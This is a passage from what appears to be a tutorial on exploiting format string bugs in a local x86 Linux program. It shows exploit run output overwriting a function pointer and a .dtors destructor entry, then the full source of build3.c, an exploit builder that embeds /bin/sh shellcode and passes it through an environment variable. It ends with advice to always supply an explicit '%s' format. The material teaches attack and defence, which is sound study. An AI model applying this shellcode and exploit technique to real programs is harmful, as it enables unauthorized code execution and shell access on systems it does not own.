vall: 63204 (f6e4)
[6öÿ¿4öÿ¿%.49143x%3$hn%.14053x%4$hn] (34)
Calling ./vuln ...
sc = 0xbffff891
adr : -1073744332 (bffff634)
val : -1073743727 (bffff891)
valh: 49151 (bfff)
vall: 63633 (f891)
[6öÿ¿4öÿ¿%.49143x%3$hn%.14482x%4$hn] (34)
0 0xbffff867
1 0xbffff86e
2 0xbffff891
3 0xbffff8bf
4 0xbffff8ca
helloWorld() = 0x80486c4
accessForbidden() = 0x80486e8
before : ptrf() = 0x80486c4 (0xbffff634)
buffer = [6öÿ¿4öÿ¿0000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000
000000000000000] (127)
after : ptrf() = 0xbffff891 (0xbffff634)
bash$
Won again: it works much better that way ;-) The eggshell
    is in the stack and we changed the address pointed to by
    ptrf so that it points to our shellcode. Of course, this
    can only work if the stack is executable.
But we have seen that format strings allow us to write
    anywhere: let's add a destructor to our program in the section
    .dtors:
>>objdump -s -j .dtors vuln
vuln: file format elf32-i386
Contents of section .dtors:
80498c0 ffffffff 00000000 ........
>>./bui2 80498c4 3
Calling ./bui2 ...
adr : 134518980 (80498c4)
val : -1073744156 (bffff6e4)
valh: 49151 (bfff)
vall: 63204 (f6e4)
[ÆÄ%.49143x%3$hn%.14053x%4$hn] (34)
Calling ./vuln ...
sc = 0xbffff894
adr : 134518980 (80498c4)
val : -1073743724 (bffff894)
valh: 49151 (bfff)
vall: 63636 (f894)
[ÆÄ%.49143x%3$hn%.14485x%4$hn] (34)
0 0xbffff86a
1 0xbffff871
2 0xbffff894
3 0xbffff8c2
4 0xbffff8ca
helloWorld() = 0x80486c4
accessForbidden() = 0x80486e8
before : ptrf() = 0x80486c4 (0xbffff634)
buffer = [ÆÄ000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000
0000000000000000] (127)
after : ptrf() = 0x80486c4 (0xbffff634)
Welcome in "helloWorld"
bash$ exit
exit
>>
Here, no coredump is created while quitting our
    destructor. This is because our shellcode contains an
    exit(0) call.
To conclude, as a last gift, here is build3.c, which
    also gives a shell, but with the shellcode passed through an
    environment variable:
/* build3.c */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
char* build(unsigned int addr, unsigned int value, unsigned int where)
{
  //Same function as in build.c
}
extern char **environ;   /* not declared by the headers above */
int main(int argc, char **argv) {
  char **env;
  char **arg;
  char *buf;
  unsigned char shellcode[] =
     "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
      "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
       "\x80\xe8\xdc\xff\xff\xff/bin/sh";
  if (argc == 3) {
    fprintf(stderr, "Calling %s ...\n", argv[0]);
    /* 32-bit x86 is assumed: a pointer fits in an unsigned int */
    buf = build(strtoul(argv[1], NULL, 16),  /* address */
        (unsigned int) shellcode,
        atoi(argv[2]));              /* offset */
    
    fprintf(stderr, "%d\n", (int) strlen(buf));
    fprintf(stderr, "[%s] (%d)\n", buf, (int) strlen(buf));
    printf("%s",  buf);
    arg = (char **) malloc(sizeof(char *) * 3);
    arg[0]=argv[0];
    arg[1]=buf;
    arg[2]=NULL;
    env = (char **) malloc(sizeof(char *) * 4);
    env[0]=(char *) shellcode;
    env[1]=argv[1];
    env[2]=argv[2];
    env[3]=NULL;
    execve(argv[0],arg,env);
  } else 
  if(argc==2) {
    fprintf(stderr, "Calling ./vuln ...\n");
    fprintf(stderr, "sc = %p\n", environ[0]);
    buf = build(strtoul(environ[1], NULL, 16),  /* address */
        (unsigned int) environ[0],
        atoi(environ[2]));              /* offset */
    
    fprintf(stderr, "%d\n", (int) strlen(buf));
    fprintf(stderr, "[%s] (%d)\n", buf, (int) strlen(buf));
    printf("%s",  buf);
    arg = (char **) malloc(sizeof(char *) * 3);
    arg[0]=argv[0];
    arg[1]=buf;
    arg[2]=NULL;
    execve("./vuln",arg,environ);
  }
    
  return 0;
}
    Once again, since this environment is in the stack, we need to
    take care not to modify the memory layout (i.e. not to change the
    position of the variables and arguments). The binary's name must
    contain the same number of characters as the name of the vulnerable
    program vuln.
Here, we choose to use the global variable extern char
    **environ to set the values we need:
environ[0]: contains the shellcode;
environ[1]: contains the address where we expect to write;
environ[2]: contains the offset.
The safest habit is to always supply an explicit format such as "%s" when functions such as
    printf(), syslog(), ..., are called. If
    you really can't avoid it, then you have to check the input given by the user
    very carefully.
    exec*() trick),
    his encouragements ... but also for his article on format bugs
    which caused, in addition to our interest in the question,
    intense cerebral agitation ;-)